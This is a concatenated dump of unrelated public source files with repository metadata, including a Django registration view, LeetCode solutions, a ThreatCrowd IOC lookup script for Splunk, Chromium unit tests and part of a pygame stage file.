08c9f961074cb25d9eab1cf25d4fdfef08792002 | 70f66599f8e4f3294a14f317af20d54c8fde440c | /beyondhealthhack/beyondhealthhack/wsgi.py | ef92a34382d0d77f5851333b0a69d1da7eed97d1 | [] | no_license | Jh123x/Beyond-health-hack-2021 | b91bad078e83028adc0459c7e13434fb7ae75ec4 | c8208bb4989cce8ada9766b7de0b719f536f9d96 | refs/heads/main | 2023-06-22T11:53:11.390969 | 2021-07-14T14:55:18 | 2021-07-14T14:55:18 | 382,859,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | """
WSGI config for beyondhealthhack project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'beyondhealthhack.settings')
application = get_wsgi_application()
| [
"wenjh1998@gmail.com"
] | wenjh1998@gmail.com |
2a8fdd258e6761431797bfe4ce7c1e78c398dc5a | cb6d7c967c0f5068e5a2add3723b612839ba07b0 | /user/views.py | 81db221b1bb82cc957687f083bcf73fcac9c225d | [] | no_license | ChanoPark/sj_chat_backend | 97eb7580767ce00cb85ba703c827a57315888e9e | 7165c942b8b1e37281dcc8b76382275caf6b36d1 | refs/heads/main | 2023-02-26T19:22:20.524187 | 2021-02-03T05:35:58 | 2021-02-03T05:35:58 | 332,686,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,899 | py | from django.contrib.auth.models import User #기본유저모델
from django.forms.models import model_to_dict #모델을 딕셔너리형태로 반환
from rest_framework import status
from rest_framework.response import Response # json형태로 반환하기 위함
from rest_framework.decorators import api_view, permission_classes, authentication_classes
#api_view: 어떤 메소드 형태로 들어왔는지, json을 딕셔너리 형태로 만듬
#permission_classes: 로그인한 유저만 들어올지말지 / 3번째는 이유모름
from rest_framework.permissions import IsAuthenticated #로그인 했는지 안했는지
from user.serializer import UserShortcutSerializer
@api_view(['POST']) #무조건 POST 형식으로만 받는다. put,delete,get방식으로 안받기위해
def register(request): #request 어디서,어떤 정보가 왔는지에 대한 객체
data = request.data #딕셔너리형태로 들어가있음
required_fields = ('username', 'password', 'first_name','last_name', 'email' ) #회원가입시 필요한 필드, 필요한 정보가 다 들어있는지
if all(i in data for i in required_fields): #required_필드에 있는 데이터가 모두 있으면 true
user_check = User.objects.filter(username=data['username']) #아이디 중복 확인
email_check = User.objects.filter(email=data['email']) #이메일 중복확인
if user_check.exists(): #중복 아이디 존재시
return Response({"message" : "아이디가 존재합니다."}, status=status.HTTP_409_CONFLICT) #리스폰스 딕셔너리 형태로 반환
elif email_check.exists():
return Response({"message":"이메일이 존재합니다."}, status = status.HTTP_409_CONFLICT)
else: #이제 회원가입 시켜줌
user = User.objects.create_user(
data['username'],
data['email'],
data['password'],
)
user.first_name = data['first_name']
user.last_name = data['last_name']
user.save()
return Response(model_to_dict(user), status=status.HTTP_201_CREATED) #유저를 딕셔너리로 만들어서 반환
else: #필드 검증 실패
return Response({"message": "key error"}, status=status.HTTP_BAD_REQUEST)
@api_view(['GET']) #특정 메소드로만 요청을 받게 한다
@permission_classes((IsAuthenticated,)) #로그인 되었을 경우만 뷰함수 실행, 로그인 안했으면 401을 뱉음 / 이터레이티브가 들어감
def my_profile(request): #내 정보 가져오기
user = request.user
serializer = UserShortcutSerializer(user) #값이 여러개면 (user, many=true) 하면됌 / 이건 원하는 값을 필터링
return Response(serializer.data, status=status.HTTP_200_OK)
| [
"koc081900@korea.ac.kr"
] | koc081900@korea.ac.kr |
7d51d7a2ed6f5210cb3d90865585ac7981656575 | 5950c456b9b347d67c8f9bdbbc99060d4a3bc6d4 | /152.Maximum Product Subarray.py | 23d3e4c7ff1bc1a4a41b9d8506da482772ff4210 | [] | no_license | redrumshinning/Leetcode | c24541eab864281ff07315ca81c5cccb9da559e0 | 5ded4c79f567639042bcf6eb71ece910f54a5af9 | refs/heads/master | 2020-03-26T13:05:10.825896 | 2019-07-31T09:34:41 | 2019-07-31T09:34:41 | 144,922,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 685 | py | class Solution(object):
def maxProduct(self, nums):
"""
动态规划
nums会有负数,所以在保存最大值时如果遇到负数不做保存的话,后面如果有
另一个负数,最大值就不对了,所以同时保存最大值和最小值
:type nums: List[int]
:rtype: int
"""
maxvalue = minvalue = nums[0]
globalmax = nums[0]
for i in range(1,len(nums)):
temp = maxvalue
maxvalue = max(temp*nums[i],minvalue*nums[i],nums[i])
minvalue = min(temp*nums[i],minvalue*nums[i],nums[i])
globalmax = max(globalmax,maxvalue)
return globalmax | [
"1184761736@qq.com"
] | 1184761736@qq.com |
8d3e9d28c7d3cbb3972f10322e33431fd9210f4f | 982cee5d250b972e2a8c2aaa9ad9648661435119 | /src/my_session.py | 535077020f45a49b4bc9fa9e1db4b777ac29f0f3 | [] | no_license | yewberry/mycollector | ac9d6f0663a11d0d1223845805732fce731351dc | 6bd7585bff6541753f6c8b90b9f24c15709a2b41 | refs/heads/master | 2021-01-20T02:37:29.674866 | 2017-09-01T10:05:51 | 2017-09-01T10:05:51 | 89,429,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | # -*- coding: utf-8 -*-
import os
import cPickle
from my_glob import LOG
from my_glob import Singleton
class MySession(object):
__metaclass__ = Singleton
def __init__(self, file_path=""):
LOG.info(u"session path:{}".format(file_path))
self.file_path = file_path
self.session = {}
if self.file_path == "":
LOG.error("session file path is empty which shouldn't happen")
elif os.path.isfile(self.file_path):
with open(self.file_path, "rb") as f:
self.session = cPickle.load(f)
def get(self, key, default=None):
val = self.session[key] if key in self.session else None
return val if val is not None else default
def set(self, key, val):
self.session[key] = val
with open(self.file_path, "wb") as f:
cPickle.dump(self.session, f, cPickle.HIGHEST_PROTOCOL)
| [
"yewberry@163.com"
] | yewberry@163.com |
66cc1a4ea3850ef7dfca7e84bf4c5b041a488acf | 87752d226647cf42e925c0264a2355d8ea513be2 | /gen_tests.py | 14e6091043381f999fff252fb0743c163f9143ce | [] | no_license | AlbertoEAF/BSS | 401d7d5af12d004c0ec6fcc11807e1ec95f97a49 | a683c01acb83a94268380fa6d11a035953ab26b8 | refs/heads/master | 2021-03-27T20:46:14.280319 | 2014-10-02T03:24:33 | 2014-10-02T03:24:33 | 23,039,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,832 | py | #! /usr/bin/python3
from os import listdir
from os.path import isfile, join
import os
import subprocess as sub
import re
from ConfigParser import *
from color_codes import *
from parse_run import *
def raw_string(s):
if isinstance(s, str):
s = s.encode('string-escape')
elif isinstance(s, unicode):
s = s.encode('unicode-escape')
return s
def listdir_waves(dirpath):
return [ f for f in listdir(dirpath) if f[-4:]==".wav" ]
def get_wav_files(dirpath, pattern):
""" Returns the relative paths of the .wav files in a dir that match the regexp pattern. """
all_files = listdir_waves(dirpath)
files = []
for f in all_files:
if re.match(pattern, f):
#files.append(dirpath+'/'+f)
files.append(f)
return files
def print_wavlist(name, dirpath, full_list, partial_list):
print(YELLOW,name," @ ", dirpath, ": ",NOCOLOR, sep="", end="")
for f in full_list:
if f in partial_list:
print(CYAN,f,NOCOLOR, sep="", end=" ")
else:
print(f, end=" ")
print(YELLOW,"(",len(partial_list),"/",len(full_list),")\n",NOCOLOR, sep="")
def exclude(f, f_ref, exclusion_rules):
""" Implemented only for the format GnN.wav where G is the gender and n the number of the speaker of that gender thus the subject is identified with Gn and N is the sentence, where both G and n take one character. """
excl = False
if 'same' in exclusion_rules:
if f == f_ref:
excl = True
if 'same_sex' in exclusion_rules:
if f[0] == f_ref[0]:
excl = True
if 'same_subject' in exclusion_rules:
if f[:2] == f_ref[:2]:
excl = True
if 'same_sentence' in exclusion_rules:
if f[2:] == f_ref[2:]:
excl = True
return excl
def gen_test(test_file):
"""
Takes a .test file and generates the necessary .csim files or runs the tests if mix is the command
"""
# We're only interested in getting the dictionary
test = ConfigParser(test_file)
rules = test['exclusion_rules'].split()
sources = test['sources'].split()
N = len(sources)
print(YELLOW, "\nN =", N, NOCOLOR, "\n")
dirs = []
files = []
for n in range(N):
dirpath = sources[n][:sources[n].rfind('/')]
pattern = sources[n][sources[n].rfind('/')+1:]
dirs.append( dirpath )
files.append( get_wav_files(dirpath, pattern) )
print_wavlist("s"+str(n),dirpath,listdir_waves(dirpath),files[n])
combinations = []
import itertools
combs_count = 0
excls_count = 0
all_combinations = itertools.product(*files)
for combination in all_combinations:
combs_count += 1
exclude_flag = False
for n1 in range(N-1):
for n2 in range(1,N):
if exclude(combination[n1], combination[n2], rules):
exclude_flag = True
if exclude_flag:
excls_count += 1
else:
combinations.append(combination)
print(YELLOW,"(",combs_count-excls_count,"/",combs_count,")\n",NOCOLOR, sep="")
if test['mixer'] == 'mix':
for i_c in range(len(combinations)):
c = combinations[i_c]
print("Testing (",i_c,"/",len(combinations),") : ", c, sep="")
sub.check_call(['mix']+[ dirs[n]+'/'+c[n] for n in range(N) ])
sub.check_call(["rm","-f","ecoduet.log","bss_eval.log"])
out=sub.check_output(['r','omni.cfg'])
(o,e) = parse_run("ecoduet.log", "bss_eval.log")
print(RED,o,e,NOCOLOR)
elif test['mixer'] == 'csim':
print("Not implemented yet!")
exit(1)
else:
print("Invalid mixer mode!")
exit(1)
gen_test('t.test')
| [
"albertoeafworks@gmail.com"
] | albertoeafworks@gmail.com |
c4765a14009d0d9a9af8c24c57ca868d88a1d5ba | 479898d0162fd9b00a43dfcc5f3a9db899ea8c09 | /bin/threatcrowd.py | 14e652b6f324cb66df2a5e5bf6b8839aa9dfa65c | [
"MIT"
] | permissive | Tmvrdummy11/osweep | bf09bc1b4960856d477a7f0c093e7c4194650a68 | 1d987ef95854df637d7222932f88331365c0e71c | refs/heads/master | 2020-04-12T13:01:58.349172 | 2018-12-19T23:45:54 | 2018-12-19T23:45:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,288 | py | #!/opt/splunk/bin/python
"""
Description: Use ThreatCrowd to quickly identify related infrastructure and
malware. The script accepts a list of strings (domains, IPs, or email addresses):
| threatcrowd <IOCs>
or input from the pipeline (any field where the value is a domain, IP, and/or
email address). The first argument is the name of one field:
<search>
| fields <IOC_FIELD>
| threatcrowd <IOC_FIELD>
Output: List of dictionaries
Source: https://www.threatcrowd.org/index.php
Instructions:
1. Switch to the ThreatCrowd dashboard in the OSweep app.
2. Add the list of IOCs to the "IP, Domain, or Email (+)" textbox.
3. Select the IOC type.
4. Click "Submit".
Rate Limit: 1 request/10s
Results Limit: None
Notes: None
Debugger: open("/tmp/splunk_script.txt", "a").write("{}: <MSG>\n".format(<VAR>))
"""
import os
import sys
from time import sleep
script_path = os.path.dirname(os.path.realpath(__file__)) + "/_tp_modules"
sys.path.insert(0, script_path)
import validators
import commons
api = "http://www.threatcrowd.org/searchApi/v2/{}/report/?{}={}"
def process_iocs(results):
"""Return data formatted for Splunk from ThreatCrowd."""
if results != None:
provided_iocs = [y for x in results for y in x.values()]
else:
provided_iocs = sys.argv[1:]
session = commons.create_session()
splunk_table = []
for provided_ioc in set(provided_iocs):
provided_ioc = commons.deobfuscate_url(provided_ioc)
if validators.ipv4(provided_ioc):
ioc_type = "ip"
elif validators.domain(provided_ioc):
ioc_type = "domain"
elif validators.email(provided_ioc):
ioc_type = "email"
if validators.ipv4(provided_ioc) or validators.domain(provided_ioc):
ioc_dicts = query_threatcrowd(provided_ioc, ioc_type, session)
elif validators.email(provided_ioc):
ioc_dicts = query_threatcrowd(provided_ioc, ioc_type, session)
else:
splunk_table.append({"invalid": provided_ioc})
continue
for ioc_dict in ioc_dicts:
splunk_table.append(ioc_dict)
if len(provided_iocs) > 1:
sleep(10)
session.close()
return splunk_table
def query_threatcrowd(provided_ioc, ioc_type, session):
"""Pivot off an IP or domain and return data as an dictonary."""
ioc_dicts = []
resp = session.get(api.format(ioc_type, ioc_type, provided_ioc), timeout=180)
if resp.status_code == 200 and "permalink" in resp.json().keys() and \
provided_ioc in resp.json()["permalink"]:
for key in resp.json().keys():
if key == "votes" or key == "permalink" or key == "response_code":
continue
elif key == "resolutions":
for res in resp.json()[key]:
res = commons.lower_keys(res)
ioc_dicts.append(res)
else:
for value in resp.json()[key]:
key = commons.lower_keys(key)
ioc_dicts.append({key: value})
else:
ioc_dicts.append({"no data": provided_ioc})
return ioc_dicts
if __name__ == "__main__":
current_module = sys.modules[__name__]
commons.return_results(current_module)
| [
"theemailaddressishare@gmail.com"
] | theemailaddressishare@gmail.com |
5514cf98695a998af222480eea475c9dc957363c | abf2ee47a829fdb6557edc1a7a13bc5a0d204485 | /crowd_counting/crowdcounting/application/picture_lib.py | f9fb68523866aec464c3cf675c1bd51692e1bb52 | [
"MIT"
] | permissive | buyeah1109/Crowdedness-Detector-with-3D-Visualization | 5a208699a32255de599ecca6541b78788b73d97b | 8aa2db813ee4abff58d06fc2cfee3a3a5f34558b | refs/heads/main | 2023-02-24T21:12:45.173928 | 2021-01-31T06:13:14 | 2021-01-31T06:13:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,525 | py | import numpy as np
from PIL import Image
import os
rootdir = os.path.join('./data/npy')
def fetch(loc, floor, section):
for (dirpath,dirnames,filenames) in os.walk(rootdir):
for filename in filenames:
if os.path.splitext(filename)[1] == '.npy':
name = os.path.splitext(filename)[0]
imput = loc + '_' + floor + '_' + section
if imput == name:
picpath = './data/npy/' + filename
return picpath
print('NO RESULTS FOUNG')
def getCount(loc, floor, section):
for (dirpath,dirnames,filenames) in os.walk(rootdir):
for filename in filenames:
if os.path.splitext(filename)[1] == '.npy':
name = os.path.splitext(filename)[0]
imput = loc + '_' + floor + '_' + section
if imput == name:
picpath = './data/npy/' + filename
pic_info = np.load(picpath, allow_pickle=True)
return pic_info.item().get('cnt')
print('NO RESULTS FOUNG')
def getCrowdness(loc, floor, section):
for (dirpath,dirnames,filenames) in os.walk(rootdir):
for filename in filenames:
if os.path.splitext(filename)[1] == '.npy':
name = os.path.splitext(filename)[0]
imput = loc + '_' + floor + '_' + section
if imput == name:
picpath = './data/npy/' + filename
pic_info = np.load(picpath, allow_pickle=True)
return pic_info.item().get('cr')
print('NO RESULTS FOUNG')
def fetchAll(loc, floor, section):
filelist = []
for (dirpath,dirnames,filenames) in os.walk(rootdir):
for filename in filenames:
if os.path.splitext(filename)[1] == '.npy':
picpath = './data/npy/' + filename
pic_info = np.load(picpath, allow_pickle=True)
loclength = len(loc)
if pic_info.item().get('loc')[0:loclength] == loc:
floorlength = len(floor)
if pic_info.item().get('floor')[0:floorlength] == floor:
seclength = len(section)
if pic_info.item().get('section')[0:seclength] == section:
img = Image.open(pic_info.item().get('path'))
filelist.append(picpath)
if not filelist:
print('NO RESULTS FOUNG')
return filelist
| [
"z1054276327@gmail.com"
] | z1054276327@gmail.com |
abd3bcdbedfbf53aa74ec49c4c5efae200ede1c3 | 536656cd89e4fa3a92b5dcab28657d60d1d244bd | /tools/perf/core/results_processor/command_line_unittest.py | 5dd1f9abc72545c59b4f8dfebf02d90dec2e566e | [
"Zlib",
"LGPL-2.0-or-later",
"LGPL-2.1-only",
"MIT",
"APSL-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-unknown"
] | permissive | ECS-251-W2020/chromium | 79caebf50443f297557d9510620bf8d44a68399a | ac814e85cb870a6b569e184c7a60a70ff3cb19f9 | refs/heads/master | 2022-08-19T17:42:46.887573 | 2020-03-18T06:08:44 | 2020-03-18T06:08:44 | 248,141,336 | 7 | 8 | BSD-3-Clause | 2022-07-06T20:32:48 | 2020-03-18T04:52:18 | null | UTF-8 | Python | false | false | 7,545 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for results_processor.
These tests mostly test that argument parsing and processing work as expected.
They mock out accesses to the operating system, so no files are actually read
nor written.
"""
import datetime
import posixpath
import re
import unittest
import mock
from core.results_processor import command_line
# To easily mock module level symbols within the command_line module.
def module(symbol):
return 'core.results_processor.command_line.' + symbol
class ProcessOptionsTestCase(unittest.TestCase):
def setUp(self):
self.standalone = False
# Mock os module within results_processor so path manipulations do not
# depend on the file system of the test environment.
mock_os = mock.patch(module('os')).start()
def realpath(path):
return posixpath.normpath(posixpath.join(mock_os.getcwd(), path))
def expanduser(path):
return re.sub(r'~', '/path/to/home', path)
mock_os.getcwd.return_value = '/path/to/curdir'
mock_os.path.realpath.side_effect = realpath
mock_os.path.expanduser.side_effect = expanduser
mock_os.path.dirname.side_effect = posixpath.dirname
mock_os.path.join.side_effect = posixpath.join
mock.patch(module('_DefaultOutputDir'),
return_value='/path/to/output_dir').start()
mock.patch(module('path_util.GetChromiumSrcDir'),
return_value='/path/to/chromium').start()
def tearDown(self):
mock.patch.stopall()
def ParseArgs(self, args):
parser = command_line.ArgumentParser(standalone=self.standalone)
options = parser.parse_args(args)
command_line.ProcessOptions(options)
return options
class TestProcessOptions(ProcessOptionsTestCase):
def testOutputDir_default(self):
options = self.ParseArgs([])
self.assertEqual(options.output_dir, '/path/to/output_dir')
def testOutputDir_homeDir(self):
options = self.ParseArgs(['--output-dir', '~/my_outputs'])
self.assertEqual(options.output_dir, '/path/to/home/my_outputs')
def testOutputDir_relPath(self):
options = self.ParseArgs(['--output-dir', 'my_outputs'])
self.assertEqual(options.output_dir, '/path/to/curdir/my_outputs')
def testOutputDir_absPath(self):
options = self.ParseArgs(['--output-dir', '/path/to/somewhere/else'])
self.assertEqual(options.output_dir, '/path/to/somewhere/else')
@mock.patch(module('datetime'))
def testIntermediateDir_default(self, mock_datetime):
mock_datetime.datetime.utcnow.return_value = (
datetime.datetime(2015, 10, 21, 7, 28))
options = self.ParseArgs(['--output-dir', '/output'])
self.assertEqual(options.intermediate_dir,
'/output/artifacts/run_20151021T072800Z')
@mock.patch(module('datetime'))
def testIntermediateDir_withResultsLabel(self, mock_datetime):
mock_datetime.datetime.utcnow.return_value = (
datetime.datetime(2015, 10, 21, 7, 28))
options = self.ParseArgs(
['--output-dir', '/output', '--results-label', 'test my feature'])
self.assertEqual(options.intermediate_dir,
'/output/artifacts/test_my_feature_20151021T072800Z')
def testUploadBucket_noUploadResults(self):
options = self.ParseArgs([])
self.assertFalse(options.upload_results)
self.assertIsNone(options.upload_bucket)
@mock.patch(module('cloud_storage'))
def testUploadBucket_uploadResultsToDefaultBucket(self, mock_storage):
mock_storage.BUCKET_ALIASES = {'output': 'default-bucket'}
options = self.ParseArgs(['--upload-results'])
self.assertTrue(options.upload_results)
self.assertEqual(options.upload_bucket, 'default-bucket')
@mock.patch(module('cloud_storage'))
def testUploadBucket_uploadResultsToBucket(self, mock_storage):
mock_storage.BUCKET_ALIASES = {'output': 'default-bucket'}
options = self.ParseArgs(
['--upload-results', '--upload-bucket', 'my_bucket'])
self.assertTrue(options.upload_results)
self.assertEqual(options.upload_bucket, 'my_bucket')
@mock.patch(module('cloud_storage'))
def testUploadBucket_uploadResultsToAlias(self, mock_storage):
mock_storage.BUCKET_ALIASES = {
'output': 'default-bucket', 'special': 'some-special-bucket'}
options = self.ParseArgs(
['--upload-results', '--upload-bucket', 'special'])
self.assertTrue(options.upload_results)
self.assertEqual(options.upload_bucket, 'some-special-bucket')
def testDefaultOutputFormat(self):
options = self.ParseArgs([])
self.assertEqual(options.output_formats, ['html'])
def testUnkownOutputFormatRaises(self):
with self.assertRaises(SystemExit):
self.ParseArgs(['--output-format', 'unknown'])
def testNoDuplicateOutputFormats(self):
options = self.ParseArgs(
['--output-format', 'html', '--output-format', 'csv',
'--output-format', 'html', '--output-format', 'csv'])
self.assertEqual(options.output_formats, ['csv', 'html'])
def testTraceProcessorPath_noBuildDir(self):
with mock.patch(module('os.environ.get'), return_value=None):
options = self.ParseArgs([])
self.assertIsNone(options.trace_processor_path)
def testTraceProcessorPath_chromiumOutputDir(self):
def isfile(path):
return path == '/path/to/chromium/out_test/Debug/trace_processor_shell'
def env_get(name):
if name == 'CHROMIUM_OUTPUT_DIR':
return '/path/to/chromium/out_test/Debug'
with mock.patch(module('os.path.isfile')) as isfile_patch:
with mock.patch(module('os.environ.get')) as env_patch:
isfile_patch.side_effect = isfile
env_patch.side_effect = env_get
options = self.ParseArgs([])
self.assertEqual(options.trace_processor_path,
'/path/to/chromium/out_test/Debug/trace_processor_shell')
def testTraceProcessorPath_oneBuildDir(self):
def isfile(path):
return path == '/path/to/chromium/out/Release/trace_processor_shell'
with mock.patch(module('os.path.isfile')) as isfile_patch:
isfile_patch.side_effect = isfile
options = self.ParseArgs([])
self.assertEqual(options.trace_processor_path,
'/path/to/chromium/out/Release/trace_processor_shell')
def testTraceProcessorPath_twoBuildDirs(self):
def isfile(path):
return path in ['/path/to/chromium/out/Release/trace_processor_shell',
'/path/to/chromium/out/Debug/trace_processor_shell']
with mock.patch(module('os.path.isfile')) as isfile_patch:
isfile_patch.side_effect = isfile
options = self.ParseArgs([])
self.assertIsNone(options.trace_processor_path)
class StandaloneTestProcessOptions(ProcessOptionsTestCase):
def setUp(self):
super(StandaloneTestProcessOptions, self).setUp()
self.standalone = True
def testOutputFormatRequired(self):
with self.assertRaises(SystemExit):
self.ParseArgs([])
def testIntermediateDirRequired(self):
with self.assertRaises(SystemExit):
self.ParseArgs(['--output-format', 'json-test-results'])
def testSuccessful(self):
options = self.ParseArgs(
['--output-format', 'json-test-results',
'--intermediate-dir', 'some_dir'])
self.assertEqual(options.output_formats, ['json-test-results'])
self.assertEqual(options.intermediate_dir, '/path/to/curdir/some_dir')
self.assertEqual(options.output_dir, '/path/to/output_dir')
| [
"pcding@ucdavis.edu"
] | pcding@ucdavis.edu |
53bd21551303a9812df6895c3a5bcf7d5342dedb | d772869033c47a666622e9ee518bb306db5451a5 | /unified/modules/main/categories/crm/entities/deal.py | 0bcaee514289e3195334ae924481bbb68f1f6ee0 | [] | no_license | funny2code/unified_api | 920f1e19b2304e331b019f8a531d412b8759e725 | ffa28ba0e5c0bd8ad7dd44a468e3d1e777bba725 | refs/heads/main | 2023-08-31T16:00:17.074427 | 2021-10-04T04:09:45 | 2021-10-04T04:09:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | from dataclasses import dataclass
@dataclass
class Deal:
deal_id: str = None
account_id: str = None
name: str = None
close_date: str = None
description: str = None
stage_id: str = None
value: str = None
probability: str = None
owner_id : str = None
contact_id: str = None
currency_id: str = None | [
"baidawardipendar@gmail.com"
] | baidawardipendar@gmail.com |
832cce96b7f9dfa6dbddcb796fe9a8b2301cf122 | 2065098a18b5ecc3e08b6f1634a59c54b2a6dcd6 | /item/migrations/0011_item_tag.py | f83793352c43d578b67bea0a8429f66853a9c5bb | [] | no_license | JongtaeKim93/point_mall | 03a83b0f913b3db56fa9048b0a3b7ed3085830b5 | abd0862297a6ed946913f0441f0fac6c41f23567 | refs/heads/master | 2022-12-23T17:54:36.722102 | 2019-08-29T08:01:48 | 2019-08-29T08:01:48 | 198,540,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | # Generated by Django 2.2.3 on 2019-08-20 02:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('item', '0010_tag'),
]
operations = [
migrations.AddField(
model_name='item',
name='tag',
field=models.ManyToManyField(related_name='tags', to='item.Tag'),
),
]
| [
"minahn93@gmail.com"
] | minahn93@gmail.com |
611e284cb8350ee5e0530de97ff2121e728b6f84 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/279/66340/submittedfiles/testes.py | 7ccd166e96f0a4767cbe69f6d5511f7efefae093 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
print("andre bezerra de barrros ")
print("24")
print(11+1037)
print((9*35+160)/5)
print(3.14159*(10/2)*(10/2)*30)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
50231bfaaa346862a809d5b0b867c22d6adfb0e0 | 450525bb5cb613c3b1b331ad6a48259c53d93f4b | /array/flip.py | 0b17f47423cc6a8132ac8d7be6da579c952eef69 | [] | no_license | peterdjlee/ds_algorithms | 61dcf4e3af2db8332841462f901cab9a6df4d0cb | 87827ad4c51c3ddf5822877a2f4803f99db5d0cc | refs/heads/master | 2020-05-25T16:52:17.685132 | 2019-11-10T05:04:20 | 2019-11-10T05:04:20 | 187,895,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,085 | py | # "Flipping an Image" from Leetcode
# Given a binary matrix A, we want to flip the image horizontally,
# then invert it, and return the resulting image.
# To flip an image horizontally means that each row of the image is reversed.
# For example, flipping [1, 1, 0] horizontally results in [0, 1, 1].
# To invert an image means that each 0 is replaced by 1, and each 1 is replaced by 0.
# For example, inverting [0, 1, 1] results in [1, 0, 0].
# EXAMPLE 1
# Input: [[1,1,0],[1,0,1],[0,0,0]]
# Output: [[1,0,0],[0,1,0],[1,1,1]]
# Explanation: First reverse each row: [[0,1,1],[1,0,1],[0,0,0]].
# Then, invert the image: [[1,0,0],[0,1,0],[1,1,1]]
# EXAMPLE 2
# Input: [[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]
# Output: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]
# Explanation: First reverse each row: [[0,0,1,1],[1,0,0,1],[1,1,1,0],[0,1,0,1]].
# Then invert the image: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]
# Notes:
# 1 <= A.length = A[0].length <= 20
# 0 <= A[i][j] <= 1
def flipAndInvertImage(matrix):
height = len(matrix)
width = len(matrix[0])
for r in range(height):
for c in range(width):
if c < int(width / 2):
# Invert
matrix[r][c] = 0 if matrix[r][c] == 1 else 1
# Swap
temp = matrix[r][width - 1 - c]
matrix[r][width - 1 - c] = matrix[r][c]
matrix[r][c] = temp
# Invert
matrix[r][c] = 0 if matrix[r][c] == 1 else 1
if width % 2 == 1: # If the width is odd
# Invert middle
matrix[r][int(width / 2)] = 0 if matrix[r][int(width / 2)] == 1 else 1
return matrix
mat = [[1, 1, 0], [1, 0, 1], [0, 0, 0]]
solution = [[1,0,0],[0,1,0],[1,1,1]]
# print(mat)
if flipAndInvertImage(mat) == solution:
print("Case 1 Passed")
else:
print("Case 1 Failed")
mat = [[1, 1, 0, 0], [1, 0, 0, 1], [0, 1, 1, 1], [1, 0, 1, 0]]
solution = [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]
if flipAndInvertImage(mat) == solution:
print("Case 2 Passed")
else:
print("Case 2 Failed")
| [
"peterdjlee@gmail.com"
] | peterdjlee@gmail.com |
fffb6afe04ae24bc0ad2edd767d297c6d60f611e | f56de46df70081cc7f7479b5c9177cba88725c24 | /stage8_state.py | 667a78babed37880e9d5b71ff05db620a4443e2d | [] | no_license | DongGyu96/2DGP | 7418397da1166f1f4ecc05a56737e6d152e30fd2 | 7f3d0384381fcc6ad8df621538e972b5bd55d8b9 | refs/heads/master | 2021-01-24T08:15:54.878516 | 2016-12-22T13:02:14 | 2016-12-22T13:02:14 | 68,904,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,354 | py | import game_framework
import main_state
import math
import stage7_state
from pico2d import *
from Ball_Object import Ball
from Block_Object import Block
from BGM_Object import BGM
name = "Stage8_State"
image = None
text_image = None
circle = None
blueball = None
redball = None
blueball_effect = None
redball_effect = None
pausebutton_image = None
move = False
reverse = True
RedBall = None
BlueBall = None
blocks = None
running = None
pausemenu_image = None
redball_dead = None
blueball_dead = None
count = None
dead_animation_frame = None
blueball_dead_image = None
redball_dead_image = None
bgm = None
def enter():
global image
global text_image
global pausebutton_image
global circle
global blueball, blueball_effect, blueball_dead_image
global redball, redball_effect, redball_dead_image
global running
global RedBall, BlueBall, blocks
global pausemenu_image
global blueball_dead, redball_dead, dead_animation_frame, count
global bgm
pausemenu_image = load_image('Resource/pause_image.png')
circle = load_image('Resource/circle.png')
blueball = load_image('Resource/blueball.png')
redball = load_image('Resource/redball.png')
blueball_effect = load_image('Resource/blueball_effect.png')
redball_effect = load_image('Resource/redball_effect.png')
text_image = load_image('Resource/stage8.png')
pausebutton_image = load_image('Resource/pausebutton.png')
image = load_image('Resource/stage_background.png')
blueball_dead_image = load_image('Resource/blueball_dead_animation.png')
redball_dead_image = load_image('Resource/redball_dead_animation.png')
RedBall = Ball(390, 150, 0)
BlueBall = Ball(110, 150, 180)
blocks = [Block(0, 1400, 4), Block(250, 2250, 4), Block(500, 1400, 4), Block(250, 1200, 2), Block(180, 1500, 2), Block(400, 3050, 4), Block(50, 2900, 3), Block(50, 3100, 3), Block(50, 3300, 3), Block(100, 3600, 1), Block(100, 3850, 1), Block(100, 4100, 1), Block(400, 4350, 1)]
running = True
count = 0
dead_animation_frame = 0
redball_dead = False
blueball_dead = False
bgm = BGM(8)
pass
def exit():
global blocks
global RedBall, BlueBall
global bgm
del(bgm)
del(RedBall)
del(BlueBall)
for block in blocks:
del(block)
pass
def update(frame_time):
global blueball_dead, redball_dead, dead_animation_frame, count, running
if running == True:
for block in blocks:
block.update(frame_time)
if move == True:
if reverse == True:
BlueBall.move(True, frame_time)
RedBall.move(True, frame_time)
elif reverse == False:
BlueBall.move(False, frame_time)
RedBall.move(False, frame_time)
